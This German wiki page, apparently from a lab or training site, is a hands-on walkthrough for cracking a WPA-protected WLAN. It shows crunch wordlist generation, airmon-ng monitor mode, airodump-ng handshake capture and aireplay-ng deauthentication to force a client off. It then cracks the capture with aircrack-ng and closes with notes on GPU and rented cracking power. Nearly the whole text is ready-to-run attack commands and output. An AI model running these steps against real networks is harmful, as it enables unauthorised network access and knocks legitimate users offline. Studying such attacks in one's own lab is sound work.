Wlan Bruteforce Attacke Praxis
Zur Navigation springen
Zur Suche springen
Passwordliste generieren
- crunch 8 8 0123456789 -o password.lst
Crunch will now generate the following amount of data: 900000000 bytes ... dies dauert eine Weile
Stoppen von störenden Diensten
- systemctl stop avahi-daemon
- systemctl stop NetworkManager
Interface suchen
- airmon-ng
PHY Interface Driver Chipset phy0 wlan0 rtl8192cu Edimax Technology Co., Ltd EW-7811Un 802.11n [Realtek RTL8188CUS]
- Wenn störende Prozesse angezeigt werden diese "killen"
- echo INT=wlan0 >> data
- source data
Interface Monitor mode
- airmon-ng start $INT
Checken
- airmon-ng check $INT
Wlans anzeigen
- airodump-ng $INT
Wir suchen nach der BSSID und dem Channel von "dd-xinux"
- echo BSSIDAP=00:18:F8:DA:F7:94 >> data
- echo CHANNEL=6 >> data
Wir suchen nach einer STADION die sich mit "dr-xinux" verbindet
- echo BSSIDSTADION=44:74:6C:54:68:E8 >> data
Handshake besorgen
- source data
- airodump-ng --bssid $BSSIDAP -c $CHANNEL -w wlan.cap $INT
(sends deauthentication packets) im zweiten Fenster
- source data
- aireplay-ng -0 50 -a $BSSIDAP -c $BSSIDSTADION $INT
18:40:39 Waiting for beacon frame (BSSID: 00:18:F8:DA:F7:94) on channel6 ..... 18:57:44 Sending 64 directed DeAuth (code 7). STMAC: [44:74:6C:54:^C:E8] [ 0| 9 ACKs]
- bis der client rausfliegt
Nach dem Wiederverbinden kommt der handshake
Handshake erhalten
HANDSHAKE=00:18:F8:DA:F7:94
Cracken
- aircrack-ng -w password.lst -b $BSSIDAP wlan.cap-01.cap
Crack Geschwindigkeiten
- Laptop schafft circa 1000 Keys pro Sekunde
- Eine starke Grafikkarte (Titan XP) schaft 520000 hash/s
- Online Rechenpower mieten
- Cluster aus mehreren Grafikkarten bauen